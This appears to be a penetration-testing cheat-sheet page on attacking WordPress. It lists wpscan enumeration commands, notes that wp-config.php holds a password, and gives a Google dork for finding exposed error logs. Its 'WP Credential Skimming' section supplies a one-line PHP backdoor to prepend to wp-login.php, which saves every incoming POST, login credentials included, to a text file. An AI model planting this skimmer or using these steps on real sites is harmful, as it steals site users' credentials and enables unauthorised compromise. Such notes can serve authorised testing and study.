search

WordPress

hashtag
WPscan:

wpscan -u 10.10.10.10/wp/
wpscan --url http://10.10.10.10 --detection-mode aggressive -t 20 -e u,ap,tt,vt

hashtag
Interesting features:

  • Enumerate directories, users

  • Password attacks

  • Scan for vulns in core, plugins, themes

hashtag
WordPress files:

  • wp-config.php: Has password

hashtag
WP Credential Skimming:

This attack needs backdoor access. In htdocs, edit the wp-login.php file with a new line added to the start of the file: <?php file_put_contents('log.txt', file_get_contents('php://input'));?>

This will capture all incoming POSTs and save them into a txt file in the htdocs folder. We would then see captured input in the file when people login or do other interesting POST activity.

circle-check

Google Dork for vuln versions. Example: "error_log" inurl:/wp-content

hashtag
Look for vulnerable plugins:

PreviousCMSNextJoomla

Last updated